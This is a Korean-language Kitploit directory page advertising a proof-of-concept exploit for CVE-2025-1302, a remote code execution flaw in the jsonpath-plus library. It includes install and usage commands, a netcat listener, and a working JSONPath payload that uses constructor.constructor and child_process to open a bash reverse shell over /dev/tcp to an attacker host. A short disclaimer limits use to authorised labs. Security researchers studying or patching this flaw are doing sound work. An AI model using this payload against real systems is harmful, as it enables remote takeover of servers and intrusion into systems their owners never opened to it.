Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — jsonpath-plus의 CVE-2025-1302에 대한 PoC 익스플로잇 및 취약 서버 데모 | Kitploit
도구/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

jsonpath-plus의 CVE-2025-1302에 대한 PoC 익스플로잇 및 취약 서버 데모

저장소 보기
111년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-1302 JSONPath-Plus RCE PoC

PoC 스크립트 이름: poc.py

CVE-2025-1302에 대한 개념 증명(PoC) 익스플로잇 스크립트로, jsonpath-plus 라이브러리의 RCE 취약점을 대상으로 합니다. 취약한 서비스 엔드포인트에 대해 실행하면 JSONPath 페이로드를 통해 원격 코드 실행을 트리거하고 공격자에게 역방향 셸(reverse shell)을 연결하려고 시도합니다.


기능

  • 유연한 HTTP 메서드: --method 또는 --no-fallback 플래그를 통해 POST, GET, AUTO(GET 대체가 있는 POST)를 지원합니다.
  • 사용자 정의 페이로드: 파일에서 하나 이상의 JSONPath RCE 페이로드 템플릿을 로드하며, {ip} 및 {port} 템플릿을 지원합니다.
  • 기본 제공 페이로드: 페이로드 파일이 제공되지 않으면 완전한 형태의 bash 역방향 셸 템플릿을 사용합니다.
  • 상세 디버깅: POST 및 GET 시도가 실패할 때 전체 요청/응답 본문을 출력합니다.
  • 진행 표시: tqdm 진행 막대로 지연 및 페이로드 루프를 표시합니다.
  • 로깅: 선택적으로 --output을 사용하여 모든 결과를 JSON 파일로 저장합니다.
  • 설치

    1. 이 저장소를 클론합니다:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. 의존성을 설치합니다 (Python 3.6 이상 필요):

      root@kitploit:~
      pip install -r requirements.txt
      

    사용법

    1. 공격자 머신에서 리스너를 시작합니다 (필요에 따라 포트 변경):

      root@kitploit:~
      nc -lvnp 9999
      
    2. PoC를 실행합니다:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: 줄마다 JSONPath 페이로드 하나가 포함된 파일. {ip} 및 {port} 자리 표시자를 사용합니다.
    • --delay: 페이로드 전송 전 대기 시간(초). 카운트다운을 표시합니다.
    • --method: POST, GET, AUTO(기본값) 중 하나를 강제로 지정합니다.
    • --no-fallback: GET 재시도를 건너뛰는 약식 옵션 (--method POST와 동일).
    • --output: 시도 결과 JSON 로그를 저장할 경로.

    예제 페이로드 파일

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    기여

    1. 저장소를 포크하고 기능 브랜치를 만듭니다.
    2. 변경 사항으로 풀 리퀘스트를 제출합니다.

    면책 조항

    이 스크립트는 오직 통제된 실습 환경에서, 소유하거나 테스트할 명시적 권한이 있는 시스템에 대해서만 사용하십시오. 악용은 불법적이고 비윤리적일 수 있습니다.

    도구 다운로드